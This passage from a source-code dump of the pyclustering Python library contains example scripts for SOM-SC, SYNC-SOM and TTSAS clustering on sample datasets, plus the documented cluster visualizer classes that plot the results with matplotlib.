template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 6);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2);
def cluster_lsun():
template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, 3);
def cluster_target():
template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, 6);
def cluster_two_diamonds():
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 2);
def cluster_wing_nut():
template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, 2);
def cluster_chainlink():
template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, 2);
def cluster_hepta():
template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, 7);
def cluster_tetra():
template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, 4);
def cluster_engy_time():
template_clustering(FCPS_SAMPLES.SAMPLE_ENGY_TIME, 2);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_elongate();
cluster_lsun();
cluster_target();
cluster_two_diamonds();
cluster_wing_nut();
cluster_chainlink();
cluster_hepta();
cluster_tetra();
cluster_engy_time();
```
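A minimal SOM-SC sketch, stripped of the timing and visualization in the example file above (the arguments mirror what `template_clustering` passes; note the library itself spells the epoch parameter 'epouch'):
```python
from pyclustering.cluster.somsc import somsc
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample

sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
# 2 clusters, 100 training epochs, C++ core enabled.
somsc_instance = somsc(sample, 2, 100, True)
somsc_instance.process()
print(somsc_instance.get_clusters())
```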
#### File: cluster/examples/syncsom_examples.py
```python
from random import random
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.syncsom import syncsom
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.utils import read_sample, draw_dynamics
from pyclustering.utils import timedcall
def template_clustering(file, map_size, radius, sync_order = 0.999, show_dyn = False, show_layer1 = False, show_layer2 = False, show_clusters = True):
# Read sample
sample = read_sample(file)
# Create network
network = syncsom(sample, map_size[0], map_size[1], radius)
# Run processing
(ticks, (dyn_time, dyn_phase)) = timedcall(network.process, show_dyn, sync_order)
print("Sample: ", file, "\t\tExecution time: ", ticks, "\n")
# Show dynamic of the last layer.
if show_dyn is True:
draw_dynamics(dyn_time, dyn_phase, x_title = "Time", y_title = "Phase", y_lim=[0, 3.14])
if show_clusters is True:
clusters = network.get_som_clusters()
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, network.som_layer.weights)
visualizer.show()
# Show network stuff.
if show_layer1 is True:
network.show_som_layer()
if show_layer2 is True:
network.show_sync_layer()
if show_clusters is True:
clusters = network.get_clusters()
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.show()
def cluster_simple1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [4, 4], 1.0, 0.999, True, True, True, True)
def cluster_simple1_as_som():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [1, 2], 1.0, 0.999, True, True, True, True)
def cluster_simple2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [4, 4], 1.0, 0.999, True, True, True, True)
def cluster_simple2_as_som():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [1, 3], 1.0, 0.999, True, True, True, True)
def cluster_simple3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [5, 5], 1.0, 0.999, True, True, True, True)
def cluster_simple4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [5, 5], 1.0, 0.999, True, True, True)
def cluster_simple5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [5, 5], 1.0, 0.999, True, True, True)
def cluster_lsun():
template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [9, 9], 0.45, 0.999, True, True, True)
def cluster_target():
template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [9, 9], 0.9, 0.999, True, True, True)
def cluster_two_diamonds():
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [10, 10], 0.15, 0.999, True, True, True)
def cluster_wing_nut():
template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [10, 10], 0.25, 0.999, True, True, True)
def cluster_chainlink():
template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [10, 10], 0.5, 0.999, True, True, True)
def cluster_hepta():
template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [7, 7], 1.0, 0.999, True, True, True)
def cluster_tetra():
template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [7, 7], 0.4, 0.998, True, True, True)
def experiment_execution_time():
template_clustering(FCPS_SAMPLES.SAMPLE_LSUN, [4, 4], 0.45, 0.999, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_TARGET, [4, 4], 0.9, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_WING_NUT, [4, 4], 0.25, 0.999, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_CHAINLINK, [4, 4], 0.5, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_TETRA, [4, 4], 0.4, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_HEPTA, [6, 6], 1.0, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [4, 4], 0.15, 0.998, False, False, False, False)
template_clustering(FCPS_SAMPLES.SAMPLE_ATOM, [4, 4], 15, 0.998, False, False, False, False)
def experiment_execution_one_cluster_dependence(layer_first_size, radius, order):
print("Experiment: map size =", layer_first_size[0] * layer_first_size[1], "radius =", radius, "order =", order)
cluster_sizes = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150]
for cluster_size in cluster_sizes:
# generate data sets
dataset = []
dataset += [ [random(), random()] for _ in range(cluster_size) ]
general_value = 0.0
amount_attempt = 5
for _ in range(amount_attempt):
network = syncsom(dataset, layer_first_size[0], layer_first_size[1], radius)
(ticks, (dyn_time, dyn_phase)) = timedcall(network.process, False, order)
general_value += ticks
print("Sample: ", cluster_size, "\t\tExecution time: ", general_value / float(amount_attempt))
print("\n")
cluster_simple1()
cluster_simple1_as_som()
cluster_simple2()
cluster_simple2_as_som()
cluster_simple3()
cluster_simple4()
cluster_simple5()
cluster_lsun()
cluster_target()
cluster_two_diamonds()
cluster_chainlink()
cluster_hepta()
cluster_tetra()
experiment_execution_time()
experiment_execution_one_cluster_dependence([5, 5], 0.6, 0.998)
experiment_execution_one_cluster_dependence([6, 6], 0.6, 0.998)
experiment_execution_one_cluster_dependence([7, 7], 0.6, 0.998)
experiment_execution_one_cluster_dependence([8, 8], 0.6, 0.998)
experiment_execution_one_cluster_dependence([9, 9], 0.6, 0.998)
experiment_execution_one_cluster_dependence([10, 10], 0.6, 0.998)
```
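The essential SYNC-SOM calls from the file above, condensed into a sketch (map size, radius and order are taken from `cluster_simple1`; visualization and dynamic collection are omitted):
```python
from pyclustering.cluster.syncsom import syncsom
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample

sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
# First layer: SOM with a 4x4 map; second layer: Sync network with radius 1.0.
network = syncsom(sample, 4, 4, 1.0)
# process(collect_dynamic, order): no dynamic collection, synchronization order 0.999.
network.process(False, 0.999)
print(network.get_clusters())      # clusters in terms of input data points
print(network.get_som_clusters())  # clusters in terms of SOM neurons
```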
#### File: cluster/examples/ttsas_examples.py
```python
from pyclustering.cluster.bsas import bsas_visualizer;
from pyclustering.cluster.ttsas import ttsas;
from pyclustering.samples.definitions import SIMPLE_SAMPLES, FCPS_SAMPLES;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import distance_metric, type_metric;
def template_clustering(path, threshold1, threshold2, **kwargs):
metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE));
ccore = kwargs.get('ccore', False);
draw = kwargs.get('draw', True);
sample = read_sample(path);
print("Sample: ", path);
ttsas_instance = ttsas(sample, threshold1, threshold2, ccore=ccore, metric=metric);
ttsas_instance.process();
clusters = ttsas_instance.get_clusters();
representatives = ttsas_instance.get_representatives();
if draw is True:
bsas_visualizer.show_clusters(sample, clusters, representatives);
def cluster_sample1():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1.0, 2.0);
def cluster_sample2():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 1.0, 2.0);
def cluster_sample3():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 1.0, 2.0);
def cluster_sample4():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 1.0, 2.0);
def cluster_sample5():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 1.0, 2.0);
def cluster_sample6():
template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 1.0, 2.0);
def cluster_elongate():
template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 1.0, 2.0);
def cluster_two_diamonds():
template_clustering(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, 1.0, 2.0);
cluster_sample1();
cluster_sample2();
cluster_sample3();
cluster_sample4();
cluster_sample5();
cluster_sample6();
cluster_elongate();
cluster_two_diamonds();
```
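Condensed from the file above, a minimal TTSAS sketch; the two thresholds follow the standard TTSAS scheme (a distance below the first threshold joins an existing cluster, a distance above the second starts a new one, and points in between are deferred):
```python
from pyclustering.cluster.ttsas import ttsas
from pyclustering.samples.definitions import SIMPLE_SAMPLES
from pyclustering.utils import read_sample
from pyclustering.utils.metric import distance_metric, type_metric

sample = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1)
# Thresholds 1.0 and 2.0 with squared Euclidean distance, as in the examples above.
ttsas_instance = ttsas(sample, 1.0, 2.0, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
ttsas_instance.process()
print(ttsas_instance.get_clusters())
print(ttsas_instance.get_representatives())
```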
#### File: pyclustering/cluster/__init__.py
```python
import itertools
import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from mpl_toolkits.mplot3d import Axes3D
from pyclustering.utils.color import color as color_list
class canvas_cluster_descr:
"""!
@brief Description of cluster for representation on canvas.
"""
def __init__(self, cluster, data, marker, markersize, color):
"""!
@brief Constructor of cluster representation on the canvas.
@param[in] cluster (array_like): Single cluster that consists of objects or indexes from data.
@param[in] data (array_like): Objects that should be displayed, can be None if clusters consist of objects instead of indexes.
@param[in] marker (string): Type of marker that is used for drawing objects.
@param[in] markersize (uint): Size of marker that is used for drawing objects.
@param[in] color (string): Color of the marker that is used for drawing objects.
"""
## Cluster that may consist of objects or indexes of objects from data.
self.cluster = cluster
## Data where objects are stored. It can be None if clusters consist of objects instead of indexes.
self.data = data
## Marker that is used for drawing objects.
self.marker = marker
## Size of marker that is used for drawing objects.
self.markersize = markersize
## Color that is used for coloring marker.
self.color = color
## Attributes of the cluster - additional collections of data points that are related to the cluster.
self.attributes = []
class cluster_visualizer_multidim:
"""!
@brief Visualizer for cluster in multi-dimensional data.
@details The multi-dimensional cluster visualizer is most useful for data whose dimension is greater than three, but it
is able to visualize data of any dimension. The multi-dimensional visualizer helps to overcome a
'cluster_visualizer' shortcoming - the ability to display clusters only in 1-, 2- or 3-dimensional data
space.
Example of clustering results visualization where `Iris` is used:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FAMOUS_SAMPLES
from pyclustering.cluster import cluster_visualizer_multidim
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.cluster.xmeans import xmeans
# load 4D data sample 'Iris'
sample_4d = read_sample(FAMOUS_SAMPLES.SAMPLE_IRIS)
# initialize 3 initial centers using K-Means++ algorithm
centers = kmeans_plusplus_initializer(sample_4d, 3).initialize()
# performs cluster analysis using X-Means
xmeans_instance = xmeans(sample_4d, centers)
xmeans_instance.process()
clusters = xmeans_instance.get_clusters()
# visualize obtained clusters in multi-dimensional space
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_4d)
visualizer.show(max_row_size=3)
@endcode
Visualized clustering results of `Iris` data (multi-dimensional data):
@image html xmeans_clustering_famous_iris.png "Fig. 1. X-Means clustering results (data 'Iris')."
Sometimes there is no need to display results in all dimensions. The parameter `pair_filter` can be used to display only
interesting coordinate pairs. Here is an example of visualization of the coordinate pairs (x0, x1) and (x0, x2) for the
previous clustering results:
@code
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_4d)
visualizer.show(pair_filter=[[0, 1], [0, 2]])
@endcode
Visualized results of specified coordinate pairs:
@image html xmeans_clustering_famous_iris_filtered.png "Fig. 2. X-Means clustering results (x0, x1) and (x0, x2) (data 'Iris')."
The multi-dimensional visualizer can be used to display clusters in 1-, 2- and 3-dimensional data similarly to
`cluster_visualizer`. `cluster_visualizer_multidim` uses three plots to display 3-dimensional data:
`(x0, x1)`, `(x0, x2)` and `(x1, x2)`. Here is an example:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.cluster import cluster_visualizer_multidim
from pyclustering.cluster.gmeans import gmeans
# load 3-dimensional data sample 'Hepta'
sample_3d = read_sample(FCPS_SAMPLES.SAMPLE_HEPTA)
# performs cluster analysis using G-Means algorithm
clusters = gmeans(sample_3d).process().get_clusters()
# visualize obtained clusters in 3-dimensional space (x0, x1), (x0, x2), (x1, x2):
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_3d)
visualizer.show(max_row_size=3)
@endcode
Visualized clustering results of `Hepta` data (3-dimensional data):
@image html gmeans_hepta_multidim_visualizer.png "Fig. 3. G-Means clustering results (3-dimensional data 'Hepta')."
Example with 2-dimensional data `Lsun`:
@code
# load 2-dimensional data sample 'Lsun'
sample_2d = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
clusters = gmeans(sample_2d).process().get_clusters()
# visualize obtained clusters in 2-dimensional space (x0, x1):
visualizer = cluster_visualizer_multidim()
visualizer.append_clusters(clusters, sample_2d)
visualizer.show()
@endcode
Visualized clustering results of `Lsun` (2-dimensional data):
@image html gmeans_lsun_multidim_visualizer.png "Fig. 4. G-Means clustering results (2-dimensional data 'Lsun')."
"""
def __init__(self):
"""!
@brief Constructs cluster visualizer for multidimensional data.
@details The visualizer is more suitable for data whose dimension is greater than 3.
"""
self.__clusters = []
self.__figure = None
self.__grid_spec = None
def __del__(self):
"""!
@brief Close matplotlib figure that was used for visualization.
"""
if self.__figure is not None:
plt.close(self.__figure)
def append_cluster(self, cluster, data=None, marker='.', markersize=None, color=None):
"""!
@brief Appends cluster for visualization.
@param[in] cluster (array_like): Cluster that may consist of indexes of objects from the data or of the objects themselves.
@param[in] data (array_like): If defined, each element of the cluster is considered as an index of an object from the data.
@param[in] marker (string): Marker that is used for displaying objects from cluster on the canvas.
@param[in] markersize (uint): Size of marker.
@param[in] color (string): Color of marker.
@return Returns index of cluster descriptor on the canvas.
"""
if len(cluster) == 0:
raise ValueError("Empty cluster is provided.")
markersize = markersize or 5
if color is None:
index_color = len(self.__clusters) % len(color_list.TITLES)
color = color_list.TITLES[index_color]
cluster_descriptor = canvas_cluster_descr(cluster, data, marker, markersize, color)
self.__clusters.append(cluster_descriptor)
def append_clusters(self, clusters, data=None, marker='.', markersize=None):
"""!
@brief Appends list of cluster for visualization.
@param[in] clusters (array_like): List of clusters where each cluster may consist of indexes of objects from the data or of the objects themselves.
@param[in] data (array_like): If defined, each element of a cluster is considered as an index of an object from the data.
@param[in] marker (string): Marker that is used for displaying objects from clusters on the canvas.
@param[in] markersize (uint): Size of marker.
"""
for cluster in clusters:
self.append_cluster(cluster, data, marker, markersize)
def save(self, filename, **kwargs):
"""!
@brief Saves figure to the specified file.
@param[in] filename (string): File where the visualized clusters should be stored.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'visible_axis', 'visible_labels', 'visible_grid', 'max_row_size').
<b>Keyword Args:</b><br>
- visible_axis (bool): Defines visibility of axes on each canvas, if True - axes are visible.
By default axes of each canvas are not displayed.
- visible_labels (bool): Defines visibility of labels on each canvas, if True - labels are displayed.
By default labels of each canvas are displayed.
- visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
By default grid of each canvas is displayed.
- max_row_size (uint): Maximum number of canvases on one row.
"""
if len(filename) == 0:
raise ValueError("Impossible to save visualization to file: empty file path is specified.")
self.show(None,
visible_axis=kwargs.get('visible_axis', False),
visible_labels=kwargs.get('visible_labels', True),
visible_grid=kwargs.get('visible_grid', True),
max_row_size=kwargs.get('max_row_size', 4),
show=False)
plt.savefig(filename)
def show(self, pair_filter=None, **kwargs):
"""!
@brief Shows clusters (visualize) in multi-dimensional space.
@param[in] pair_filter (list): List of coordinate pairs that should be displayed. This argument is used as a filter.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'visible_axis', 'visible_labels', 'visible_grid', 'max_row_size', 'show').
<b>Keyword Args:</b><br>
- visible_axis (bool): Defines visibility of axes on each canvas, if True - axes are visible.
By default axes of each canvas are not displayed.
- visible_labels (bool): Defines visibility of labels on each canvas, if True - labels are displayed.
By default labels of each canvas are displayed.
- visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
By default grid of each canvas is displayed.
- max_row_size (uint): Maximum number of canvases on one row. By default the maximum value is 4.
- show (bool): If True - displays the visualized clusters. By default it is `True`.
"""
if len(self.__clusters) == 0:
raise ValueError("There are no non-empty clusters for visualization.")
if self.__clusters[0].data is not None:
cluster_data = self.__clusters[0].data
else:
cluster_data = self.__clusters[0].cluster
dimension = len(cluster_data[0])
acceptable_pairs = pair_filter or []
pairs = []
amount_axis = 1
axis_storage = []
if dimension > 1:
pairs = self.__create_pairs(dimension, acceptable_pairs)
amount_axis = len(pairs)
self.__figure = plt.figure()
self.__grid_spec = self.__create_grid_spec(amount_axis, kwargs.get('max_row_size', 4))
for index in range(amount_axis):
ax = self.__create_canvas(dimension, pairs, index, **kwargs)
axis_storage.append(ax)
for cluster_descr in self.__clusters:
self.__draw_canvas_cluster(axis_storage, cluster_descr, pairs)
if kwargs.get('show', True):
plt.show()
def __create_grid_spec(self, amount_axis, max_row_size):
"""!
@brief Create grid specification for figure to place canvases.
@param[in] amount_axis (uint): Amount of canvases that should be organized by the created grid specification.
@param[in] max_row_size (uint): Maximum number of canvases on one row.
@return (gridspec.GridSpec) Grid specification to place canvases on figure.
"""
row_size = amount_axis
if row_size > max_row_size:
row_size = max_row_size
col_size = math.ceil(amount_axis / row_size)
return gridspec.GridSpec(col_size, row_size)
def __create_pairs(self, dimension, acceptable_pairs):
"""!
@brief Create coordinate pairs that should be displayed.
@param[in] dimension (uint): Data-space dimension.
@param[in] acceptable_pairs (list): List of coordinate pairs that should be displayed.
@return (list) List of coordinate pairs that should be displayed.
"""
if len(acceptable_pairs) > 0:
return acceptable_pairs
return list(itertools.combinations(range(dimension), 2))
def __create_canvas(self, dimension, pairs, position, **kwargs):
"""!
@brief Create new canvas with user defined parameters to display cluster or chunk of cluster on it.
@param[in] dimension (uint): Data-space dimension.
@param[in] pairs (list): Pairs of coordinates that will be displayed on the canvas. If empty then labels will not
be displayed on the canvas.
@param[in] position (uint): Index position of canvas on a grid.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'visible_axis', 'visible_labels', 'visible_grid').
<b>Keyword Args:</b><br>
- visible_axis (bool): Defines visibility of axes on each canvas, if True - axes are visible.
By default axes are not displayed.
- visible_labels (bool): Defines visibility of labels on each canvas, if True - labels are displayed.
By default labels are displayed.
- visible_grid (bool): Defines visibility of grid on each canvas, if True - grid is displayed.
By default grid is displayed.
@return (matplotlib.Axis) Canvas to display a cluster or a chunk of a cluster.
"""
visible_grid = kwargs.get('visible_grid', True)
visible_labels = kwargs.get('visible_labels', True)
visible_axis = kwargs.get('visible_axis', False)
ax = self.__figure.add_subplot(self.__grid_spec[position])
if dimension > 1:
if visible_labels:
ax.set_xlabel("x%d" % pairs[position][0])
ax.set_ylabel("x%d" % pairs[position][1])
else:
ax.set_ylim(-0.5, 0.5)
ax.set_yticklabels([])
if visible_grid:
ax.grid(True)
if not visible_axis:
ax.set_yticklabels([])
ax.set_xticklabels([])
return ax
def __draw_canvas_cluster(self, axis_storage, cluster_descr, pairs):
"""!
@brief Draw clusters.
@param[in] axis_storage (list): List of matplotlib axis where cluster dimensional chunks are displayed.
@param[in] cluster_descr (canvas_cluster_descr): Canvas cluster descriptor that should be displayed.
@param[in] pairs (list): List of coordinates that should be displayed.
"""
for index_axis in range(len(axis_storage)):
for item in cluster_descr.cluster:
if len(pairs) > 0:
self.__draw_cluster_item_multi_dimension(axis_storage[index_axis], pairs[index_axis], item, cluster_descr)
else:
self.__draw_cluster_item_one_dimension(axis_storage[index_axis], item, cluster_descr)
def __draw_cluster_item_multi_dimension(self, ax, pair, item, cluster_descr):
"""!
@brief Draw cluster chunk defined by pair coordinates in data space with dimension greater than 1.
@param[in] ax (axis): Matplotlib axis that is used to display chunk of cluster point.
@param[in] pair (list): Pair of coordinate indexes that are displayed on the canvas.
@param[in] item (array_like): Data point or index of data point.
@param[in] cluster_descr (canvas_cluster_descr): Cluster description whose point is visualized.
"""
index_dimension1 = pair[0]
index_dimension2 = pair[1]
if cluster_descr.data is None:
ax.plot(item[index_dimension1], item[index_dimension2],
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
else:
ax.plot(cluster_descr.data[item][index_dimension1], cluster_descr.data[item][index_dimension2],
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
def __draw_cluster_item_one_dimension(self, ax, item, cluster_descr):
"""!
@brief Draw cluster point in one-dimensional data space.
@param[in] ax (axis): Matplotlib axis that is used to display chunk of cluster point.
@param[in] item (array_like): Data point or index of data point.
@param[in] cluster_descr (canvas_cluster_descr): Cluster description whose point is visualized.
"""
if cluster_descr.data is None:
ax.plot(item[0], 0.0,
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
else:
ax.plot(cluster_descr.data[item][0], 0.0,
color=cluster_descr.color, marker=cluster_descr.marker, markersize=cluster_descr.markersize)
class cluster_visualizer:
"""!
@brief Common cluster visualizer for 1-, 2- and 3-dimensional data.
@details The `cluster_visualizer_multidim` visualizer can be used to display clusters in N-dimensional data.
The general difference between `cluster_visualizer` and `cluster_visualizer_multidim` is the way
3-dimensional data is represented. In case of `cluster_visualizer`, 3-dimensional data is displayed in a 3-dimensional plot with
`x0`, `x1` and `x2` axes. In case of `cluster_visualizer_multidim`, it is displayed on three 2-dimensional plots:
`(x0, x1)`, `(x0, x2)` and `(x1, x2)`.
Here is an example where sample `Atom` is used for clustering and displayed by `cluster_visualizer`:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.dbscan import dbscan
sample = read_sample(FCPS_SAMPLES.SAMPLE_ATOM)
clusters = dbscan(sample, 15, 3).process().get_clusters()
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.show()
@endcode
Visualized clustering results of `Atom` data:
@image html dbscan_atom_visualizer.png "Fig. 1. DBSCAN clustering results (3-dimensional data 'Atom')."
@see cluster_visualizer_multidim
"""
def __init__(self, number_canvases=1, size_row=1, titles=None):
"""!
@brief Constructor of cluster visualizer.
@param[in] number_canvases (uint): Number of canvases that is used for visualization.
@param[in] size_row (uint): Amount of canvases that can be placed in one row.
@param[in] titles (list): List of canvas's titles.
Example:
@code
# load 2D data sample
sample_2d = read_sample(SIMPLE_SAMPLES.SAMPLE_SIMPLE1);
# load 3D data sample
sample_3d = read_sample(FCPS_SAMPLES.SAMPLE_HEPTA);
# extract clusters from the first sample using DBSCAN algorithm
dbscan_instance = dbscan(sample_2d, 0.4, 2, False);
dbscan_instance.process();
clusters_sample_2d = dbscan_instance.get_clusters();
# extract clusters from the second sample using DBSCAN algorithm
dbscan_instance = dbscan(sample_3d, 1, 3, True);
dbscan_instance.process();
clusters_sample_3d = dbscan_instance.get_clusters();
# create plot with two canvases where each row contains 2 canvases.
size = 2;
row_size = 2;
visualizer = cluster_visualizer(size, row_size);
# place clustering result of sample_2d to the first canvas
visualizer.append_clusters(clusters_sample_2d, sample_2d, 0, markersize = 5);
# place clustering result of sample_3d to the second canvas
visualizer.append_clusters(clusters_sample_3d, sample_3d, 1, markersize = 30);
# show plot
visualizer.show();
@endcode
"""
self.__number_canvases = number_canvases
self.__size_row = size_row
self.__canvas_clusters = [ [] for _ in range(number_canvases) ]
self.__canvas_dimensions = [ None for _ in range(number_canvases) ]
self.__canvas_titles = [ None for _ in range(number_canvases) ]
if titles is not None:
self.__canvas_titles = titles
self.__default_2d_marker_size = 5
self.__default_3d_marker_size = 30
def append_cluster(self, cluster, data=None, canvas=0, marker='.', markersize=None, color=None):
"""!
@brief Appends cluster to canvas for drawing.
@param[in] cluster (array_like): Cluster that may consist of indexes of objects from the data or of the objects themselves.
@param[in] data (array_like): If defined, each element of the cluster is considered as an index of an object from the data.
@param[in] canvas (uint): Number of canvas that should be used for displaying cluster.
@param[in] marker (string): Marker that is used for displaying objects from cluster on the canvas.
@param[in] markersize (uint): Size of marker.
@param[in] color (string): Color of marker.
@return Returns index of cluster descriptor on the canvas.
"""
if len(cluster) == 0:
return
if canvas >= self.__number_canvases or canvas < 0:
raise ValueError("Canvas index '%d' is out of range [0; %d]." % (canvas, self.__number_canvases - 1))
if color is None:
index_color = len(self.__canvas_clusters[canvas]) % len(color_list.TITLES)
color = color_list.TITLES[index_color]
added_canvas_descriptor = canvas_cluster_descr(cluster, data, marker, markersize, color)
self.__canvas_clusters[canvas].append(added_canvas_descriptor)
if data is None:
dimension = len(cluster[0])
if self.__canvas_dimensions[canvas] is None:
self.__canvas_dimensions[canvas] = dimension
elif self.__canvas_dimensions[canvas] != dimension:
raise ValueError("Only clusters with the same dimension of objects can be displayed on canvas.")
else:
dimension = len(data[0])
if self.__canvas_dimensions[canvas] is None:
self.__canvas_dimensions[canvas] = dimension
elif self.__canvas_dimensions[canvas] != dimension:
raise ValueError("Only clusters with the same dimension of objects can be displayed on canvas.")
if (dimension < 1) or (dimension > 3):
raise ValueError("Only 1-, 2- and 3-dimensional data can be displayed. Please, use "
"'cluster_visualizer_multidim' for visualization.")
if markersize is None:
if (dimension == 1) or (dimension == 2):
added_canvas_descriptor.markersize = self.__default_2d_marker_size
elif dimension == 3:
added_canvas_descriptor.markersize = self.__default_3d_marker_size
return len(self.__canvas_clusters[canvas]) - 1
def append_cluster_attribute(self, index_canvas, index_cluster, data, marker=None, markersize=None):
"""!
@brief Appends cluster attribute for a cluster on a specific canvas.
@details An attribute is data that is visualized for a specific cluster using its color, marker and markersize (if the last two are not specified).
@param[in] index_canvas (uint): Index canvas where cluster is located.
@param[in] index_cluster (uint): Index cluster whose attribute should be added.
@param[in] data (array_like): List of points (data) that represents attribute.
@param[in] marker (string): Marker that is used for displaying objects from cluster on the canvas.
@param[in] markersize (uint): Size of marker.
"""
cluster_descr = self.__canvas_clusters[index_canvas][index_cluster]
attribute_marker = marker
if attribute_marker is None:
attribute_marker = cluster_descr.marker
attribute_markersize = markersize
if attribute_markersize is None:
attribute_markersize = cluster_descr.markersize
attribute_color = cluster_descr.color
added_attribute_cluster_descriptor = canvas_cluster_descr(data, None, attribute_marker, attribute_markersize, attribute_color)
self.__canvas_clusters[index_canvas][index_cluster].attributes.append(added_attribute_cluster_descriptor)
def append_clusters(self, clusters, data=None, canvas=0, marker='.', markersize=None):
"""!
@brief Appends list of cluster to canvas for drawing.
@param[in] clusters (array_like): List of clusters where each cluster may consist of indexes of objects from the data or of the objects themselves.
@param[in] data (array_like): If defined, each element of a cluster is considered as an index of an object from the data.
@param[in] canvas (uint): Number of canvas that should be used for displaying clusters.
@param[in] marker (string): Marker that is used for displaying objects from clusters on the canvas.
@param[in] markersize (uint): Size of marker.
"""
for cluster in clusters:
self.append_cluster(cluster, data, canvas, marker, markersize)
def set_canvas_title(self, text, canvas=0):
"""!
@brief Set title for specified canvas.
@param[in] text (string): Title for the canvas.
@param[in] canvas (uint): Index of the canvas where title should be displayed.
"""
if canvas >= self.__number_canvases:
raise ValueError("Canvas with index '%d' does not exist (total amount of canvases: '%d')." %
(canvas, self.__number_canvases))
self.__canvas_titles[canvas] = text
def get_cluster_color(self, index_cluster, index_canvas):
"""!
@brief Returns cluster color on specified canvas.
"""
return self.__canvas_clusters[index_canvas][index_cluster].color
def save(self, filename, **kwargs):
"""!
@brief Saves figure to the specified file.
@param[in] filename (string): File where the visualized clusters should be stored.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'invisible_axis', 'visible_grid').
<b>Keyword Args:</b><br>
- invisible_axis (bool): Defines visibility of axes on each canvas, if `True` - axes are invisible.
By default axis are invisible.
- visible_grid (bool): Defines visibility of grid on each canvas, if `True` - grid is displayed.
By default grid of each canvas is displayed.
There is an example how to save visualized clusters to the PNG file without showing them on a screen:
@code
from pyclustering.cluster import cluster_visualizer
data = [[1.1], [1.7], [3.7], [5.3], [2.5], [-1.5], [-0.9], [6.3], [6.5], [8.1]]
clusters = [[0, 1, 2, 4, 5, 6], [3, 7, 8, 9]]
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, data)
visualizer.save("1-dimensional-clustering.png")
@endcode
"""
